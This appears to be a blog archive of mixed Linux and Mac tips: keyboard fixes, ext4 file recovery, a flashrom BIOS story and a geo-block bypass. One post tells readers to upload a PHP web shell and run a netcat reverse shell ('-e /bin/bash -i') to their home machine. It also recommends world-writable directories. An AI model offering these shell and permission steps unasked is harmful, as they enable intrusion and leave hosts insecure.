Archive for the ‘Believe Me’ Category

Keyboard functions have major functionality on operating systems other than MacOSX. Soon when you install Ubuntu on your Macbook, you’ll notice different problems from default keyboard function keys behavior (which needs Fn key to be hold) to extremely slow touch-pad. Most of issues and their solutions are described on the Ubuntu Macbook wiki page. But recent kernels have had some modifications that parameters described over the net, do not cover how to fix the issue with newer kernels. The old way of fixing keyboard was to add an option to Human Interface Device (HID) module of kernel to switch function keys mode. For example you might add the following contents to /etc/modprobe.d/functions.conf :

options hid pb_fnmode=2

Replace hid with usbhid for kernels older than 2.6.20. But none of them worked for my Ubuntu 10.04 Lucid running a 2.6.32 kernel. In recent kernels, Apple HIDs have a separate kernel module named hid-apple and the parameter has been changed to fnmode. Knowing these changed I tried to change the parameter by providing fnmode parameter via modprobe just like before, but failed. So to fix keyboard issue I used /sys/ interface to change fnmode parameter of hid_apple module.

root@Seeb:/home/ali# echo 2 > /sys/module/hid_apple/parameters/fnmode

Put this in your startup script /etc/rc.local before exit command, so that the issue gets fixed automatically on each boot. If you don’t know how to edit the file using root priviledges, that’s easy ! Press Alt+F2 and type the following command in your Run dialog :

gksudo gedit /etc/rc.local

For you touch-pad speed issue, all you need to do is to install gsynaptics (qsynaptics for KDE guys) package, open Touchpad Preferences from System > Preferences > Touchpad, and increase the newly shown parameters “Min Speed” and “Max Speed”:

Sometimes you purchase a web host and the only thing you have to control it, is an ftp account. For those familiar with unix-like shells, it would be really cool to have an SSH session on your account, but most of web hosts don’t allow this option. It makes the life much easier for maintaining the files and permissions.

First step is to investigate whether your php service bans the functions to execute a process or not. I’m talking about the exec and system and popen function series. You may write your own test or install a php script called “PHP Shell”. PHP Shell receives the shell commands through the web browser and executes them and finally delivers the output right at the browser window. There are lots of php shells out there. I used this one developed by Martin Geisler. Download one of them and upload it using your ftp account.

For simple operations, you can get an interactive shell using GNU netcat (Note the GNU word, there are lots of other versions and most of them do not support executing commands). If you run the following command on your machine, it would create a simple tcp listener on an specific port :

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when some one connects to your listener. Then by running the following line, we can the simply connect from the phpshell to our local listener and receive a shell :

netcat my.pc.ip.address 8999 -e “/bin/bash -i”

The above netcat command will connect to your pc at home and execute an interactive bash shell. At this stage you have a command and see the resulting shell (i call it semi interactive). Soon you’ll notice that special terminal commands such as Ctrl+D, Ctrl+C and arrow keys don’t work as expected.

We’ll use socat to overcome this problem. socat can connect almost every two streams you find in the world. From files to sockets, Terminals to udp connections, process output to tcp connection and it supports SSL connections too. But it is not installed on most distributions by default. So the first step is to get the source and compile it. We need it both on our local pc and on the web server. Well, the pc part is easy, but for the web server side you should first find out that whether the build tools (compiler, make, etc) are installed on the web server or not. Test it simply by running g++ and make in your php shell. If yes, you’re all set and follow these steps to get it running :

run wget http://www.dest-unreach.org/socat/download/socat-1.7.1.3.tar.gz

extract the file using tar -xf socat-1.7.1.3.tar.gz

cd socat-1.7.13

./configure

make

if everything went smoothly and fine, you would have the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to setup the listener, this time using socat and connect to it from the webhost, run the following command to get the listener :

The first socat command, connected a tcp socket (which is yet listening) to your current TTY and second one, connects the bash process to your tcp listener. Now, you have a fully functional TTY Terminal connected to your account in the web-host. Almost all terminal commands work and you can run vim, nano, screen and Midnight commander 😎 . There are few differences between an SSH session and this reverse shell. The most important ones are :

Your session is not encrypted, you may use SSL capabilities of socat

SSH automatically forwards some of useful shell variables, you may set them your self or put them in the .bash_profile or .bash_rc of the web hosting account, such asexport TERM=”xterm-color”

For simplicity purposes, you may put the second socat command line in a new php script to avoid using php shell each time. Note that you should either secure your php shell or delete it when everything finished to avoid others, access your account.

Some web servers run using a different user id than your current account. It would cause that you don’t have permission to create and edit files using the php shell. In such situations, creating a world wide writable directory (Enable All Permissions for All) would do the job.

The US government on Monday announced new rules making it officially legal for iPhone owners to ‘jailbreak’ their device and run unauthorized third-party applications, as well as the ability to unlock any cell phone for use on multiple carriers.”

The EFF has further details on this and some of the other legal protections granted in the new rules.

Userspace Filesystem Drivers are becoming more and more popular since they’re portable and have less headache of platform specific filesystem driver issues. For example, NTFS-3G project provides the full read/write support for NTFS under Linux and MacOSX while living in userspace.

I recently discovered an open source project called “fuse-ext2” which is an implementation of Ext2/Ext3/Ext4 filesystem driver in userspace. Before this one, there was an ext2-only native kernel extension (kext) implementation. So I had no write access to my Ext3 and no read access to Ext4 file-system at all.

To use and enable experimental write support for your Ext2 partition, follow these steps :

Download and install NTFS-3G Package which includes FUSE libraries.
AFAIK NTFS-3G has been renamed into Tuxera NTFS and is a shareware now. But any way you can download the old GPL version here. it works in both Leopard and Snow Leopard..

New ‘Ultimate Movie Buff‘ iPhone app is coming your way! Many loved the original and asked for more questions and categories and here it is. We have teamed up with ITN to bring ‘Ultimate Movie Buff’ iPhone app to you, all with videos and almost 5,000 questions.

Play, challenge and boast on Facebook and Twitter. Don’t forget to submit scores to our global high score, so we can see who is the official Global Movie Buff!

Source-Forge, The huge open-source software repository recently has banned some countries from downloading free and open-source softwares from their servers. However there’s a quick trick which you can download the files directly from source-forge mirrors, bypassing that IP address check.

You can click on the file you wanna download inside the “Files” section and take care when the following page appeared press ESC key to stop loading the page.

Now right-click on “direct link” and Copy the link address and Paste it into your address bar. It should look like this :

I just pressed the Enter key on the file delete confirmation dialog, and removed my code which I was working on for 3 hours. In fact I had made such a mistake before and had no results searching “Ext3 Recovery / Ext4 Recovery …”. But this time, a new project named extundelete appeared which claims to extract file metadata from the file-system’s Journal.

I tried to extract and compile it by just typing “make” and found that ext2fs library is missing, so I installed ext2fs-dev package using the following command (I’m using Ubuntu 9.10) :

sudo apt-get install ext2fs-dev

Then typing “make” in the src folder, presents you the binary file named “extundelete”. You can run it like this :

ali@Velocity:~/tmp/extundelete-0.1.8/src$ ./extundelete
No action specified; implying --superblock.
Usage: ./extundelete [options] [--] device-file
Options:
--version, -[vV] Print version and exit successfully.
--help, Print this help and exit successfully.
--superblock Print contents of superblock in addition to the rest.
If no action is specified then this option is implied.
--journal Show content of journal.
--after dtime Only process entries deleted on or after 'dtime'.
--before dtime Only process entries deleted before 'dtime'.
Actions:
--inode ino Show info on inode 'ino'.
--block blk Show info on block 'blk'.
--restore-inode ino Restore the file(s) with known inode number 'ino'.
The restored files are created in ./RESTORED_FILES
with their inode number as extension (ie, inode.12345).
--restore-file 'path' Will restore file 'path'. 'path' is relative to root of
the partition and does not start with a '/'
(it must be one of the paths returned by --dump-names).
The restored file is created in the current directory
as 'RECOVERED_FILES/path'.
--restore-files 'path' Will restore files which are listed in the file 'path'.
Each filename should be in the same format as
an option to --restore-file, and there should be one per line.
--restore-all Attempts to restore everything.
-j journal Reads an external journal from the named file.
-b blocknumber Uses the backup superblock at blocknumber when
opening the file system.
-B blocksize Uses blocksize as the block size when opening fs.
The number should be the number of bytes.

It seems that running the program with –restore-all, should restore all possible files. Like this :

ali@Velocity$ ./extundelete /dev/sda6 --restore-all

But that option gave me some temporary, hidden and some useless config files over my home folder. I was thinking of rewriting the code …

Suddenly I found that, extundelete supports another option in which you can specify the inode number of your file, and it will bring it back … 🙂

Looking at manual of the “ls” command you’ll find that running “ls” with -i parameter will give you the inode number of files in a directory. I tried to find a range for inode files around the deleted file and search for all files in the range …

The fact that I always try to use open source softwares makes me to find new softwares and try them to see if they can solve my problems and do the job or not. Times ago, I had tried flashrom project to see if it can update my bios chip or not and the answer was NO ! Your chipset is not supported yet !

Later on, it was about May 2009 which I found a program which could change the boot logo of Phoenix bios images and I recalled flashrom. It was interesting that this time it said “Yeah, Your chip is now being supported! :)”. I made it to read my Bios image and the result was a real and valid phoenix image which I could change it. After making a new image, running flashrom to write it finished without any warnings or errors. I read the image again and Boom ! It was neither the original bios, nor the new one.

This is exactly where my first email went up online on the community’s mailing list and I knew that any invalid act which yields to rebooting the laptop is going to kill it. :

I tried the latest svn version (6 May 09) of flashrom and unlike older versions didn’t get a warning on my chipset. flashrom reads my chip successfully and outputs a fine Phoenix bios. After writing a new image into the chip

I found that writer is not fully functional and reading the chip again results in an image that is neither original one nor the new image. then I tried erase functionality and it resulted in some 0xFF and some unchanged bytes in the chip. Currently writing either images doesn’t change the chip and it remains in mostly 0xFF bytes.

Most of open source project maintainers use IRC as their collaboration and communication channel both with themselves and community. I went online and Peter one the maintainers was online but he wasn’t the person responsible for ICH7 series chipsets, So I had to wait for Carl to come online. It was midnight in Iran and I went to bed leaving the laptop up and running. Next morning I found Carl and after working with him to find the problem, he suggested to try AAI type of Chip-Programming. It was a time consuming task and I had to go for an important session, So I left home.

When I returned back, I got no good results of AAI. The wonderful part of story is that my little sister had played with my laptop, when I was out, and didn’t power it off, so that I don’t get noticed she touched my laptop without permission. 😀

Carl reviewed the data-sheets for my Bios chip and found that It doesn’t support writing multiple bytes at a time. Finally he sent me some patches and the last patch wrote the image successfully. I worked a few more hours to finalize the patch and sent some verification emails so that Carl can commit them to the main version tree (And got acknowledges for helping to track down the bug ! 😉 ).

It was an amazing experience of active community support and I should really thank Carl-Daniel Hailfinger, Peter Stuge and all other active maintainers of open source projects.

Second Linux Festival has been successfully held at Amirkabir University of Technology (AKA Polytechnic). It has been divided into three main levels of Beginner, Intermediate and Advanced. The topics has been presented inside Computer Site of CEIT department under a much better quality comparing to the last year’s festival. People installed, tasted and utilized a new operating system in a well mannered approach. During the installation process and most of other presentations, our local server and mirror of software packages (aka SSCLinuxBox) helped a lot and became the standard way of sharing files / installing software during the festival.

Topics and Schedule

One month ago, when we were planning for festival topics and schedule, Amir-Mohammad and I reviewed many Linux-related books and their contents. This resulted into a rich outline for the festival topics. Taking a look at topics and presentation quality this was the best and first festival in Iran covering this scope of topics. Here’s a summary of main subjects and presentations :

Although it was the second experience on Linux Festival in our university and we fixed almost all of problems which could be seen in the last one, there are always problems and we can learn from them. One of the main points I got in the first few presentations, was the importance of coordination between presenters around the topics and details which is going to be presented. Lack of such synchronization and coordination before the festival, resulted into problems in presentation topics and contents since some of presenters did have a different idea about listener’s levels and prepared some extra stuff for those who where beginner. In addition none of us knew about the dependencies of subject that was going to be presented, whether they have been discussed up to now or not.

Yet another point on the art of presentation and teaching. In situations like this, where every presenter is a professional in a field and likes the topic and have chosen to teach it, hiding the unnecessary details is a very very hard task. A teacher should have the ability to place and simulate the thinking process of listeners and remove the details that might break this thinking process. On the other hand, he should analyze the required dependencies of current topic and explain them before anything.

I got many feedbacks regarding the presentation style and found that the estimation of listener’s level and correct decomposition of subject into the simplest form are keys to a successful presentation.

Memories

It was a cool and friendly atmosphere. The support team and technical team were both working hard to reach the best quality and it made it a real memory. Its notable that this was the first serious work/project of our new Scientific Committee and the results were incredible.